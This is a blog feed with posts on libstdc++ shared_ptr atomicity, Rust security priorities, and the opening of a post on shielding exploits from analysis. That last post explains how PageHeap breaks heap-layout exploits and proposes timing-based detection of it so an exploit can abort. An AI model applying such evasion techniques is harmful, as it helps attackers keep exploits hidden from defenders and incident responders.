Snf's blog — S.N. Fernandez (http://snf.github.io)

shared_ptr: the (not always) atomic reference counted smart pointer — 2019-02-13 — http://snf.github.io/2019/02/13/shared-ptr-optimization
<!--
```
rustc -O -L. main.rs
LD_LIBRARY_PATH=$LD_LIBRARY_PATH:`pwd` ./main
objdump -d a.createthread.shared -M intel |c++filt|less
g++ -shared -pthread -fPIC main.cpp -o libcreatethread.so
```
-->
<h3 id="introduction">Introduction</h3>
<p>This is a write-up of the <em>“behavioral analysis”</em> of the <code class="language-plaintext highlighter-rouge">shared_ptr<T></code> reference count in GNU’s libstdc++. This smart pointer is used to share references to the same underlying pointer.</p>
<p>The mechanism beneath works by tracking the number of references with a reference count, so the pointer is freed only after the last reference is destroyed. It is usually used in multi-threaded programs (in conjunction with other types) because of the guarantee that its reference count is tracked atomically.</p>
<!-- It turns out that when `pthread_create` is not imported, the reference count operations are not atomic. -->
<h3 id="story-time">Story time</h3>
<p>A few months ago, I was running a micro-benchmark comparing data structures in <a href="https://rust-lang.com">Rust</a> against their C++ counterparts.</p>
<p>At one point, I found that my Rust port of an immutable RB tree insertion was significantly slower than the C++ one. This was unexpected, as both codebases were idiomatic and rustc optimizes very well, usually matching C++ speed.</p>
<p>I proceeded to re-check that my code was correct. At first I thought my re-balancing code could be wrong, so I put it side by side with the C++ one, but I couldn’t find any defect.</p>
<h3 id="profiling">Profiling</h3>
<p>The second day, I started profiling with <a href="http://valgrind.org/docs/manual/cl-manual.html">callgrind</a> and <a href="http://valgrind.org/docs/manual/cg-manual.html">cachegrind</a>. Here is where I got the <em>aha</em> moment: every part of the code that was <em>copying</em> <code class="language-plaintext highlighter-rouge">shared_ptr<T></code> was much faster than my equivalent <a href="https://doc.rust-lang.org/std/sync/struct.Arc.html#method.clone"><code class="language-plaintext highlighter-rouge">Arc::clone</code></a> calls in Rust.</p>
<p>Inside KCachegrind, I saw something unexpected. The code was straightforward, but before increasing <code class="language-plaintext highlighter-rouge">shared_ptr</code>’s reference count during a pointer copy, there was a branch deciding whether to do an atomic addition or a non-atomic one. The code path being taken was the non-atomic one!</p>
<p><img src="/public/data/sharedptr/kcachegrind.png" alt="KCachegrind showing that no atomic operation was being executed" /></p>
<p>Certainly, my knowledge about <code class="language-plaintext highlighter-rouge">shared_ptr</code> was being challenged. As far as I knew, the reference count should be atomic so it could be used in parallel programs sharing the value without the risk of racing the count and ending up with dangling pointers or memory leaks.</p>
<h3 id="tracking-the-code">Tracking the code</h3>
<p>A simplified C++ proof of concept:</p>
<div class="language-cpp highlighter-rouge"><div class="highlight"><pre class="highlight"><code> <span class="k">const</span> <span class="k">auto</span> <span class="n">tree</span> <span class="o">=</span> <span class="n">make_shared</span><span class="o"><</span><span class="n">Tree</span><span class="o"><</span><span class="kt">int</span><span class="o">>></span><span class="p">(</span><span class="mi">10</span><span class="p">);</span>
<span class="k">for</span><span class="p">(</span><span class="k">auto</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o"><</span> <span class="mi">100</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
<span class="k">const</span> <span class="n">shared_ptr</span><span class="o"><</span><span class="n">Tree</span><span class="o"><</span><span class="kt">int</span><span class="o">>></span> <span class="n">tree_copy</span> <span class="o">=</span> <span class="n">tree</span><span class="p">;</span>
<span class="c1">// black_box(tree_copy);</span>
<span class="p">}</span>
</code></pre></div></div>
<p>In Rust it is almost the same line by line:</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code> <span class="k">let</span> <span class="n">tree</span> <span class="o">=</span> <span class="nn">Arc</span><span class="p">::</span><span class="nf">new</span><span class="p">(</span><span class="nn">Tree</span><span class="p">::</span><span class="nf">new</span><span class="p">(</span><span class="mi">10</span><span class="p">));</span>
<span class="k">for</span> <span class="mi">_</span><span class="n">i</span> <span class="n">in</span> <span class="mi">0</span><span class="o">..</span><span class="mi">100</span> <span class="p">{</span>
<span class="k">let</span> <span class="n">tree_copy</span> <span class="o">=</span> <span class="n">tree</span><span class="nf">.clone</span><span class="p">();</span>
<span class="c">// test::black_box(tree_copy);</span>
<span class="p">}</span>
</code></pre></div></div>
<p>To better understand what was happening, I compiled the C++ without optimizations, which gave me some disassembly to follow:</p>
<p>loop code:</p>
<pre><code class="language-asm"> d7b: cmp DWORD PTR [rbp-0x14],0x63
d7f: jg d9a <main+0x59>
d81: lea rdx,[rbp-0x30]
d85: lea rax,[rbp-0x40]
d89: mov rsi,rdx
d8c: mov rdi,rax
d8f: call f1c <std::shared_ptr<Tree<int> >::operator=(std::shared_ptr<Tree<int> > const&)> #### (*)
d94: add DWORD PTR [rbp-0x14],0x1
d98: jmp d7b <main+0x3a>
</code></pre>
<p><code class="language-plaintext highlighter-rouge">operator=</code>:</p>
<pre><code class="language-asm"> 1021: mov rax,QWORD PTR [rbp-0x8]
1025: mov rdi,rax
1028: call 1158 <std::_Sp_counted_base<(__gnu_cxx::_Lock_policy)2>::_M_add_ref_copy()> #### (*)
102d: mov rax,QWORD PTR [rbp-0x18]
1031: mov rax,QWORD PTR [rax]
</code></pre>
<p>And following <code class="language-plaintext highlighter-rouge">_M_add_ref_copy()</code>:</p>
<pre><code class="language-asm"> 116c: mov esi,0x1
1171: mov rdi,rax
1174: call cfd <__gnu_cxx::__atomic_add_dispatch(int*, int)>
</code></pre>
<p><code class="language-plaintext highlighter-rouge">__atomic_add_dispatch</code>:</p>
<pre><code class="language-asm">0000000000000cfd <__gnu_cxx::__atomic_add_dispatch(int*, int)>:
cfd: push rbp
cfe: mov rbp,rsp
d01: sub rsp,0x10
d05: mov QWORD PTR [rbp-0x8],rdi
d09: mov DWORD PTR [rbp-0xc],esi
d0c: call c20 <__gthread_active_p()> #### (1)
d11: test eax,eax
d13: setne al
d16: test al,al
d18: je d2d
d1a: mov edx,DWORD PTR [rbp-0xc]
d1d: mov rax,QWORD PTR [rbp-0x8]
d21: mov esi,edx
d23: mov rdi,rax
d26: call c59 <__gnu_cxx::__atomic_add(int volatile*, int)> #### (2)
d2b: jmp d3e
d2d: mov edx,DWORD PTR [rbp-0xc]
d30: mov rax,QWORD PTR [rbp-0x8]
d34: mov esi,edx
d36: mov rdi,rax
d39: call c9b <__gnu_cxx::__atomic_add_single(int*, int)> #### (3)
d3e: nop
d3f: leave
d40: ret
</code></pre>
<p>Once here, I found a very interesting pattern. Depending on the return of <code class="language-plaintext highlighter-rouge">__gthread_active_p()</code> (1), it could either call <code class="language-plaintext highlighter-rouge">atomic_add</code> (2) or <code class="language-plaintext highlighter-rouge">atomic_add_single</code> (3).</p>
<p><code class="language-plaintext highlighter-rouge">atomic_add</code> does what I expect:</p>
<pre><code class="language-asm"> c6b: lock add DWORD PTR [rax],edx
</code></pre>
<p>but <code class="language-plaintext highlighter-rouge">atomic_add_single</code> does not:</p>
<pre><code class="language-asm"> caa: mov edx,DWORD PTR [rax]
cac: mov eax,DWORD PTR [rbp-0xc]
caf: add edx,eax
cb1: mov rax,QWORD PTR [rbp-0x8]
cb5: mov DWORD PTR [rax],edx
</code></pre>
<p>There are no <em>atomic</em> operations inside that function, which raised new questions:</p>
<ol>
<li>Why is the C++ standard library optimizing the atomic addition?</li>
<li>Is this even safe?</li>
</ol>
<h3 id="to-atomic-or-not-to">To atomic or not to</h3>
<p>As expected, <code class="language-plaintext highlighter-rouge">atomic_add</code> and <code class="language-plaintext highlighter-rouge">atomic_add_single</code> were both straightforward:</p>
<div class="language-cpp highlighter-rouge"><div class="highlight"><pre class="highlight"><code> <span class="k">static</span> <span class="kr">inline</span> <span class="kt">void</span>
<span class="nf">__atomic_add_single</span><span class="p">(</span><span class="n">_Atomic_word</span><span class="o">*</span> <span class="n">__mem</span><span class="p">,</span> <span class="kt">int</span> <span class="n">__val</span><span class="p">)</span>
<span class="p">{</span> <span class="o">*</span><span class="n">__mem</span> <span class="o">+=</span> <span class="n">__val</span><span class="p">;</span> <span class="p">}</span>
</code></pre></div></div>
<div class="language-cpp highlighter-rouge"><div class="highlight"><pre class="highlight"><code> <span class="k">static</span> <span class="kr">inline</span> <span class="kt">void</span>
<span class="nf">__atomic_add</span><span class="p">(</span><span class="k">volatile</span> <span class="n">_Atomic_word</span><span class="o">*</span> <span class="n">__mem</span><span class="p">,</span> <span class="kt">int</span> <span class="n">__val</span><span class="p">)</span>
<span class="p">{</span> <span class="n">__atomic_fetch_add</span><span class="p">(</span><span class="n">__mem</span><span class="p">,</span> <span class="n">__val</span><span class="p">,</span> <span class="n">__ATOMIC_ACQ_REL</span><span class="p">);</span> <span class="p">}</span>
</code></pre></div></div>
<div class="language-cpp highlighter-rouge"><div class="highlight"><pre class="highlight"><code> <span class="k">static</span> <span class="kr">inline</span> <span class="kt">void</span>
<span class="nf">__attribute__</span> <span class="p">((</span><span class="n">__unused__</span><span class="p">))</span>
<span class="n">__atomic_add_dispatch</span><span class="p">(</span><span class="n">_Atomic_word</span><span class="o">*</span> <span class="n">__mem</span><span class="p">,</span> <span class="kt">int</span> <span class="n">__val</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="n">__gthread_active_p</span><span class="p">())</span>
<span class="n">__atomic_add</span><span class="p">(</span><span class="n">__mem</span><span class="p">,</span> <span class="n">__val</span><span class="p">);</span>
<span class="k">else</span>
<span class="n">__atomic_add_single</span><span class="p">(</span><span class="n">__mem</span><span class="p">,</span> <span class="n">__val</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>
<p>Now the new set of questions was about <code class="language-plaintext highlighter-rouge">__gthread_active_p()</code>. After a quick <code class="language-plaintext highlighter-rouge">grep</code>, I found that many functions depend on its return value to choose between a thread-safe operation and a plain one. Finding all of them is left as an exercise for the reader.</p>
<p>To find the right implementation of <code class="language-plaintext highlighter-rouge">__gthread_active_p</code>, I preprocessed the file with <code class="language-plaintext highlighter-rouge">g++ -E main.cpp</code> and landed on <code class="language-plaintext highlighter-rouge">/usr/include/x86_64-linux-gnu/c++/6/bits/gthr-default.h:246</code>:</p>
<div class="language-cpp highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="nf">__typeof</span><span class="p">(</span><span class="n">pthread_key_create</span><span class="p">)</span> <span class="n">__gthrw___pthread_key_create</span> <span class="n">__attribute__</span> <span class="p">((</span><span class="n">__weakref__</span><span class="p">(</span><span class="s">"__pthread_key_create"</span><span class="p">)));</span>
</code></pre></div></div>
<div class="language-cpp highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kr">inline</span> <span class="kt">int</span>
<span class="nf">__gthread_active_p</span> <span class="p">(</span><span class="kt">void</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">static</span> <span class="kt">void</span> <span class="o">*</span><span class="k">const</span> <span class="n">__gthread_active_ptr</span>
<span class="o">=</span> <span class="n">__extension__</span> <span class="p">(</span><span class="kt">void</span> <span class="o">*</span><span class="p">)</span> <span class="o">&</span><span class="n">__gthrw___pthread_key_create</span><span class="p">;</span>
<span class="k">return</span> <span class="n">__gthread_active_ptr</span> <span class="o">!=</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>
<h3 id="weakref-and-pthread_key_create"><code class="language-plaintext highlighter-rouge">weakref</code> and <code class="language-plaintext highlighter-rouge">pthread_key_create</code></h3>
<p><a href="https://gcc.gnu.org/onlinedocs/gcc-4.7.2/gcc/Function-Attributes.html"><code class="language-plaintext highlighter-rouge">__weakref__</code></a> is an attribute that declares a <strong>weak symbol</strong>. If the symbol is referenced somewhere else, it becomes available; while it isn’t, it resolves to a NULL pointer.
It can be used to declare external symbols that may or may not be available, or to define functions that can be intercepted by more specialized ones. There is a blog post with more information about it <a href="https://leondong1993.github.io/2017/04/15/strong-weak-symbol/">here</a>.</p>
<p><a href="http://pubs.opengroup.org/onlinepubs/007904975/functions/pthread_key_create.html"><code class="language-plaintext highlighter-rouge">__pthread_key_create</code></a> is a function used to create a key for storing values in thread-local storage.</p>
<p>I’m sure you have figured out by now what’s happening, but just in case, the libstdc++ developers left a comment:</p>
<!-- /* -->
<blockquote>
<p>For a program to be multi-threaded the only thing that it certainly must
be using is pthread_create. However, there may be other libraries that
intercept pthread_create with their own definitions to wrap pthreads
functionality for some purpose. In those cases, pthread_create being
defined might not necessarily mean that libpthread is actually linked
in.</p>
<p>For the GNU C library, we can use a known internal name. This is always
available in the ABI, but no other library would define it. That is
ideal, since any public pthread function might be intercepted just as
pthread_create might be. __pthread_key_create is an “internal”
implementation symbol, but it is part of the public exported ABI. Also,
it’s among the symbols that the static libpthread.a always links in
whenever pthread_create is used, so there is no danger of a false
negative result in any statically-linked, multi-threaded program.</p>
<p>For others, we choose pthread_cancel as a function that seems unlikely
to be redefined by an interceptor library. The bionic (Android) C
library does not provide pthread_cancel, so we do use pthread_create
there (and interceptor libraries lose).<br />
<!-- */ --></p>
</blockquote>
<p>So basically, what is happening here is a check for whether <code class="language-plaintext highlighter-rouge">pthread_create</code> is imported into the program. If it is, the weak reference becomes available; otherwise it is NULL. By checking this pointer, it is easy to tell whether the program is using threads or not.</p>
<h3 id="sound-or-not">Sound or not</h3>
<p>What if a program uses parallelism without bringing the <code class="language-plaintext highlighter-rouge">pthread_key_create</code> symbol into the program? Is that possible?</p>
<p>We can theorize…</p>
<h4 id="parallelism-without-pthread">Parallelism without pthread</h4>
<p>It is possible to create threads by using OS syscalls directly, bypassing the requirement of pthread completely. (Un)fortunately, I couldn’t find any popular library that implements threading through the syscall interface instead of relying on pthread. OpenMP and the few other runtimes I checked all depend on it.</p>
<p>It might exist but doesn’t seem to be very common.</p>
<h4 id="shared-library">Shared library</h4>
<p>Code compiled into a dynamic library can be called from programs that introduce external parallelism while expecting the library to be thread-safe because it uses <code class="language-plaintext highlighter-rouge">shared_ptr</code>.</p>
<p>To dig further into the question, I created an object that doesn’t use pthread_create because it expects all the parallelism to be external. An objdump of the symbol table shows that the symbol is still imported as weak (the w in the second column):</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>0000000000000000 w F *UND* 0000000000000000 __pthread_key_create@@GLIBC_2.2.5
</code></pre></div></div>
<h4 id="shared-library-loaded-by-static-binary">Shared library loaded by static binary</h4>
<p>A program that introduces the external parallelism would normally also load <code class="language-plaintext highlighter-rouge">pthread</code> and thereby enable the weak symbol in the library. However, if the loading program linked pthread statically, the dynamic loader has no way of knowing whether <code class="language-plaintext highlighter-rouge">pthread_create</code> is used by the program and wouldn’t make the weak symbol in the loaded library available. If this happens, the assumption is broken and shared_ptr behaves erroneously.</p>
<p>I assume that this is also a very rare case and from a quick googling, I can see tons of problems caused by using <code class="language-plaintext highlighter-rouge">dlopen</code> in statically compiled binaries.</p>
<p>In conclusion, I’ll assume this is not a typical scenario and it is <strong>mostly</strong> safe.</p>
<h3 id="why-not-go-further-with-the-optimization-efforts">Why not go further with the optimization efforts?</h3>
<p>If a program can assume, through runtime checks, that all its threading happens via pthread, the implementation could be adapted to also detect when more than one thread is running.</p>
<p>Speculating, pthread could update a global count of running threads whenever threads are created, (un)suspended, or canceled. As far as I can tell, the <em>check</em> doesn’t have to be atomic: while a single thread is creating another one, the count can be updated non-atomically (from one to two), and when it is suspending other threads, it can suspend each one and decrement the count afterwards. By the time the count is synchronized with the other thread, there is only one active again.</p>
<p>Is this a missed optimization opportunity? Probably not. The C++ standard is quite clear about atomic operations in the <a href="https://timsong-cpp.github.io/cppwp/requirements">libraries</a>:</p>
<blockquote>
<p>Library Wide Requirements - (2) Requirements specified in terms of interactions between threads do not apply to programs having only a single thread of execution.</p>
</blockquote>
<h3 id="other-c-implementations">Other C++ implementations</h3>
<p>After my adventure with <strong>libstdc++</strong>, I decided to check the VisualC++ and libcxx implementations.</p>
<p><a href="https://libcxx.llvm.org/">Libcxx</a> has a compile-time switch, the macro <code class="language-plaintext highlighter-rouge">_LIBCPP_HAS_NO_THREADS</code>, to disable threads completely. If it is set, all atomic operations fall back to non-atomic ones. There is more information in the <a href="https://libcxx.llvm.org/docs/DesignDocs/ThreadingSupportAPI.html">documentation</a>.</p>
<p>VisualC++ doesn’t have its source code available, but from disassembling <code class="language-plaintext highlighter-rouge">shared_ptr::operator=</code>, I can see that the increment is always atomic and there is no runtime check to fall back to a non-atomic one. It’s unclear to me whether other versions provide one.</p>
<h3 id="de-optimizing-the-micro-benchmark">De-optimizing the micro-benchmark</h3>
<p>This was an easy step: I just referenced <code class="language-plaintext highlighter-rouge">pthread_create</code> in the program and the reference count became atomic again.</p>
<p>Although uninteresting to the topic of the blog post, after the modifications, both programs performed very similarly in the benchmarks.</p>
<h3 id="add-this-optimization-to-rust">Add this optimization to Rust!</h3>
<p>Not so fast! Arc actually means Atomically Reference Counted, so it would be a plain lie if it didn’t use atomic operations on the reference count.</p>
<p>Furthermore, Rust’s std offers both <a href="https://doc.rust-lang.org/std/rc/struct.Rc.html">Rc</a> and <a href="https://doc.rust-lang.org/std/sync/struct.Arc.html">Arc</a>, which share similar APIs so they can be used interchangeably when necessary, and the type system has your back if you try to send an Rc between threads, because it is <code class="language-plaintext highlighter-rouge">!Send</code> (not Send).</p>
<h3 id="conclusion">Conclusion</h3>
<p>This was another failed case of micro-benchmarking. Optimizations go beyond your simple <code class="language-plaintext highlighter-rouge">-O3</code>. In this case, I didn’t know that libstdc++ changes its behaviour depending on whether <code class="language-plaintext highlighter-rouge">pthread_create</code> is imported by the program or not.</p>
<p>While I’m probably not going to spend any more time on this, I learned something I didn’t know about GNU’s C++ standard library and wanted to document it because it was interesting to track down.</p>
<p>Unfortunately, I cannot conclude whether <code class="language-plaintext highlighter-rouge">shared_ptr<T></code> behaviour is completely safe in uncommon environments.</p>
<p>Also, my teammates should be preparing themselves for all my new <code class="language-plaintext highlighter-rouge">weakref</code> optimizations that I’m introducing in my code…</p>
<p>Thanks for reading.</p>
<ul>
<li>Follow me on Twitter: <a href="https://twitter.com/snfernandez">@snfernandez</a></li>
<li>Contact me at Gmail: sebanfernandez</li>
<li>Secure is better: <a href="http://snf.github.io/public/data/sebanfernandez_0xEB1C845F_pub.asc">GPG Key</a></li>
</ul>
Rust 2019: security — 2019-01-10 — http://snf.github.io/2019/01/10/rust-2019-security

<h3 id="introduction">Introduction</h3>
<p>I’ve decided to write this blog post because this is one of Rust’s main selling points and the most important to me: <strong>memory safety without garbage collection</strong>.</p>
<p>The truth of that statement relies on writing purely safe Rust. Unfortunately, that’s not a real-world scenario: some crates use unsafe directly, and most depend on at least one crate that does.</p>
<p>While these unsafe cases may be completely sound, they cannot be validated by the compiler, so they rely on the developer’s good judgment. This brings us back to the same problem as having a C codebase, but with more easily findable bugs (<code class="language-plaintext highlighter-rouge">grep unsafe</code>).</p>
<p>The problem is that if we measure the safety of Rust by safe vs unsafe, the most obvious metric to optimize for is the number of unsafe lines in the code.</p>
<p>And this is why I think that security should be part of Rust’s stable ecosystem development. And 2019 should be the year for improving the processes around it.</p>
<p>This is not something new and working groups are tackling this problem from different angles and you should join them if you are interested:</p>
<ul>
<li><a href="https://rust-lang.zulipchat.com/#narrow/stream/146229-wg-secure-code">Secure Code WG</a></li>
<li><a href="http://plv.mpi-sws.org/rustbelt/#publications">RustBelt</a> and <a href="https://internals.rust-lang.org/t/announcing-the-formal-verification-working-group/7240">Formal Verification WG</a></li>
<li><a href="https://github.com/rust-rfcs/unsafe-code-guidelines">Unsafe Code Guidelines WG</a></li>
</ul>
<h3 id="unsafe-rust">Unsafe Rust</h3>
<p>A big part of the unsafe code I usually see can fit into these categories:</p>
<ul>
<li>Integrating Rust with other components through FFI</li>
<li>Functionality not available in <code class="language-plaintext highlighter-rouge">core</code> or <code class="language-plaintext highlighter-rouge">std</code> (standard library)</li>
<li>Optimizations that cannot be expressed through the type system</li>
<li>Implement <a href="https://doc.rust-lang.org/nightly/nomicon/send-and-sync.html">send and sync</a> (I’m not discussing it here)</li>
</ul>
<!-- Detecting `unsafe` in dependencies used to be a hard task but projects like [cargo-geiger] make this process smoother. -->
<h4 id="rustffi">Rust+FFI</h4>
<p>The community has already learned that <strong><em>Rewrite it in Rust</em></strong> doesn’t scale well for big or fast-moving projects.</p>
<p>On the other hand, one of the things that I learned is that gradually replacing C/C++ with Rust code works quite well. The same happens with encapsulating C code with safe Rust abstractions.</p>
<p>For mixing code, we use <a href="https://doc.rust-lang.org/nightly/nomicon/ffi.html">ffi</a> bindings usually generated by <a href="https://github.com/rust-lang/rust-bindgen">bindgen</a>.</p>
<h5 id="isolation">Isolation</h5>
<p>A problem that has no practical solution yet is how we can guarantee safety in these cases of mixed code. This happens in almost every programming language that supports FFI, so a possible implementation here might be usable in others as well.</p>
<p>The way I see it being tackled is by isolating at the FFI level: either we impose a serialization barrier to a process inside a sandbox, or we use more modern compartmentalization technologies (such as <a href="https://www.cl.cam.ac.uk/~kg365/pubs/201505-oakland2015-cheri-compartmentalization.pdf">CHERI</a>).</p>
<p>While isolating unsafe code (C/C++) into a sandbox might solve the problem and can probably be implemented <em>“easily”</em> through bindgen and other existing libraries, it will quickly incur a performance penalty and could also open a Pandora’s box of issues.</p>
<h5 id="memory-corruption-mitigations">Memory Corruption Mitigations</h5>
<p>Furthermore, to not degrade the security of existing components when mixing other (unsafe) code with Rust, we must support all the memory corruption mitigations supported by the C and C++ compilers, like <a href="https://en.wikipedia.org/wiki/Control-flow_integrity">control flow integrity</a>. At Microsoft, security is a priority when components are shipped, and not being able to impose the full spectrum of security mitigations on a component that uses unsafe or mixed code might be a blocker.</p>
<p>Control flow guard, for example, requires not only support from the linker to generate the tables and inject the right code (which both LLVM and MSVC Linker already do), but also metadata emitted by Rust’s frontend.</p>
<h4 id="functionality-not-available-in-std">Functionality not available in <em>std</em></h4>
<p>It’s very hard to track down these cases and even harder to decide which are worth adding to <code class="language-plaintext highlighter-rouge">core</code> or <code class="language-plaintext highlighter-rouge">std</code> so external libraries don’t have to implement them themselves. There is also the question: <em>is it really worth putting everything in the standard library?</em></p>
<p>An example I can think of now is casting between memory representations of the same size like <code class="language-plaintext highlighter-rouge">u64</code> to <code class="language-plaintext highlighter-rouge">[u8;8]</code>, or <code class="language-plaintext highlighter-rouge">[f32]</code> to <code class="language-plaintext highlighter-rouge">[u32]</code> as used in <a href="https://github.com/BurntSushi/byteorder">byteorder</a>.</p>
<p>The Secure Code WG is already looking for similar patterns so I’m very positive about seeing a lot of progress in this area in 2019.</p>
<p>A different approach to putting everything in the standard library is a database of components audited by third parties which developers can trust. This is the approach taken by <a href="https://github.com/dpc/crev/tree/master/cargo-crev">cargo-crev</a>. In my opinion, the only way this is going to work is if it gets integrated with Cargo once the idea is validated.</p>
<h4 id="optimizations">Optimizations</h4>
<p>I often see that, in hot paths, developers tend to do nasty things to avoid a performance impact. More often than not, the code is “safe” but uses <code class="language-plaintext highlighter-rouge">unsafe</code>.</p>
<p>One example: back when I reviewed <a href="https://github.com/Azure/iotedge/tree/master/edgelet">edgelet</a>’s source code, I found that the only unsafe code outside of FFI was for copying data into uninitialized buffers [[EDIT: This is imposed when implementing one of Tokio’s APIs and not a decision by the IoTEdge team]]. While reading from these buffers is undefined, writing to them isn’t, but it’s not possible to specify that with the current types.</p>
<p>This particular example might fall inside the previous point but I think it deserves a distinction between <em>“unsafe because faster”</em> and <em>“unsafe because I can’t safe”</em>. The solution, though, is very similar to what I proposed for the former.</p>
<h4 id="auditability">Auditability</h4>
<p>While optimizing for zero unsafe is a great goal, there will always be unsafe somewhere.</p>
<p>I like these tools and I think they will have greater impact when more companies start adopting Rust and have to fit it into the security development life-cycle (SDL):</p>
<ul>
<li><a href="https://github.com/RustSec/cargo-audit">cargo-audit</a> has a DB of crates with vulnerabilities and you can run it to check if your projects are using them</li>
<li><a href="https://github.com/rust-fuzz/cargo-fuzz">cargo-fuzz</a> makes fuzzing programs really easy through the help of LLVM’s libFuzzer</li>
<li><a href="https://github.com/anderejd/cargo-geiger">cargo-geiger</a> detects unsafe code usage from the dependencies</li>
<li><a href="https://github.com/dpc/crev/tree/master/cargo-crev">cargo-crev</a> is (an interface to) a database of audited components</li>
</ul>
<p>Leveraging all these tools in CI will surely help with SDL, and I can see a 2019 where they become an integral part of the development process.</p>
<h3 id="others">Others</h3>
<h4 id="fallible-allocations">Fallible allocations</h4>
<p>While detecting memory allocation failure is a hard problem, the current succeed-or-crash situation is an issue in places where you can predict that an allocation might fail. I worked on implementing the <code class="language-plaintext highlighter-rouge">try_alloc</code> <a href="https://github.com/rust-lang/rfcs/blob/master/text/2116-alloc-me-maybe.md">RFC</a> for the different collections but haven’t submitted a stabilization PR yet, because of concerns that ongoing <a href="https://github.com/rust-lang/rust/pull/52420">efforts</a> to improve the <code class="language-plaintext highlighter-rouge">Allocator API</code> might break backwards compatibility if it is stabilized.</p>
<h4 id="asyncawait">Async/await</h4>
<p>I’d like to see the whole async/await story improve with tokio adopting futures-0.3 and porting many of the derived crates to it as well. This year I tried using the new syntax with futures-0.3 but the ecosystem wasn’t there yet.</p>
<h4 id="a-better-ide-experience">A better IDE experience</h4>
<p>Others already mentioned it, but I think we need RLS to keep improving on the great work it has received during the past years. Not being able to use, in my case, VSCode in the same way as for C# or TypeScript is a little frustrating.</p>
<h3 id="conclusion">Conclusion</h3>
<p>While many interesting things happened during 2018, I see 2019 as a period for improving the ecosystem and tooling, and for continuing to gather feedback on adoption blockers.</p>
<p>In my case, we are using it at Microsoft with a lot of very interesting Rustaceans, and I think security should be a top priority if we want to go after <em>not quite memory safe</em> languages like C and C++.</p>
<p>Thanks for reading.</p>
<ul>
<li>Follow me on Twitter: <a href="https://twitter.com/snfernandez">@snfernandez</a></li>
<li>Contact me at Gmail: sebanfernandez</li>
<li>Secure is better: <a href="http://snf.github.io/public/data/sebanfernandez_0xEB1C845F_pub.asc">GPG Key</a></li>
</ul>
How to Protect an Exploit: Detecting PageHeap2017-05-04T00:00:00+00:00http://snf.github.io/2017/05/04/exploit-protection-i-page-heap<h3 id="introduction">Introduction</h3>
<p>Welcome back to this pretty much abandoned blog. If you don’t know me, I’ve been involved in exploit development for some time, before switching to a much less offensive job.</p>
<p>Yes, you read right, this is about protecting the exploit and <strong>not</strong> protecting from the exploit.</p>
<p>I always had these ideas on how to take exploits to the next level, not only during exploitation but also before and after executing them. I’ve written before (7 years already, wow!) about <a href="/2010/11/15/process-continuation-after-exploit/">process continuation</a> and I’m pretty sure it has been widely used in exploits for ages, even before my post.
The problem is that many of these techniques remain in the shadows because they are not used in the exploit show-offs.</p>
<p>This time, I’m writing a series of blog posts on how to protect an exploit from executing in an environment where it might not succeed. The wild is a dangerous place, and a lot of hackers have lost exploits to it.</p>
<p>In this specific series of posts on how to protect an exploit, I’ll explore different methods to detect if the program we are attacking, in this case a browser, is being analyzed with some kind of tool so we can abort the exploitation instead of failing, crashing, and being detected.</p>
<h3 id="why">Why?</h3>
<p>Exploits are <a href="https://www.forbes.com/sites/andygreenberg/2012/03/23/shopping-for-zero-days-an-price-list-for-hackers-secret-software-exploits/">valuable assets</a> so the most logical thing is that you want to keep them for as long as possible. In addition, most of the time you don’t want to be found using one. But for that to happen you need your exploit to go undetected.</p>
<p>The exploits found in the wild are usually first detected for one of four main reasons:</p>
<ul>
<li>Re-used parts of other exploits so they triggered some signature in detection products</li>
<li>Crashed because it was unreliable and was analyzed later</li>
<li><strong>Crashed because the program is being monitored and was analyzed (honeypot?)</strong></li>
<li>You shared the exploit with a friend who tried to hack his/her ex</li>
</ul>
<p>Because we are focusing on the <strong>third one</strong>, our first guest will be <a href="https://msdn.microsoft.com/en-us/library/windows/hardware/ff549561(v=vs.85).aspx">PageHeap</a>.</p>
<h3 id="how-pageheap-works">How does PageHeap work?</h3>
<p>PageHeap is a Windows tool included in the SDK/WDK whose purpose is to detect memory corruptions in the process heap as soon as possible.</p>
<p>To accomplish this, it replaces the heap allocator with another one. This allocator makes every allocation through VirtualAlloc, so each allocation is at least a page in size (4 KB on most systems).</p>
<p>But not only that: the returned address points to the end of the page minus the requested size, therefore making any heap buffer overflow hit the end of the page.</p>
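<p>As a rough sketch of that placement (assuming a 4 KB page and ignoring PageHeap’s real header bookkeeping, so the constants and names here are illustrative):</p>

```javascript
// Model of where a PageHeap-style allocator places a request inside its page.
// This is an illustration of the layout described above, not PageHeap's code.
const PAGE_SIZE = 0x1000; // 4 KB

function pageHeapAlloc(pageBase, requestedSize) {
  // The user buffer is pushed against the end of the page, so writing even
  // one byte past it touches the inaccessible guard page that follows.
  const userPtr = pageBase + PAGE_SIZE - requestedSize;
  return { userPtr, guardPage: pageBase + PAGE_SIZE };
}

const a = pageHeapAlloc(0x10000000, 0x18);
console.log(a.userPtr.toString(16)); // "10000fe8": 0x18 bytes before the guard page
console.log(a.guardPage === a.userPtr + 0x18); // true: an overflow lands on the guard page
```

<p>Real PageHeap also aligns the start of the buffer, so the exact offset can differ slightly; the point is only that the buffer ends right at the page boundary.</p>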
<p>This also defeats many widely used techniques that depend on arranging allocations into a specific heap layout, sometimes going by the name of Heap Massaging, Heap Feng Shui or others (probably coined for some BlackHat talk).</p>
<p>So, PageHeap breaks the assumptions about how the heap works, which, as described before, will make most exploits that rely on any kind of heap layout crash.</p>
<p>If it’s the first time you read about PageHeap, you might want to google more about it as it’s a very handy tool for debugging.</p>
<h3 id="how-to-detect-pageheap">How to detect PageHeap?</h3>
<p>The main difference in a program’s behavior under PageHeap is that heap allocations will be a lot slower, no matter what the size is. Remember that heaps are optimized for allocating all kinds of different object sizes as fast as possible.</p>
<p>Instead, with PageHeap, each allocation is requested from the kernel through VirtualAlloc, which involves a context switch and processing in the kernel. The time spent memsetting the memory before returning it is very short compared to the rest of the allocation process.</p>
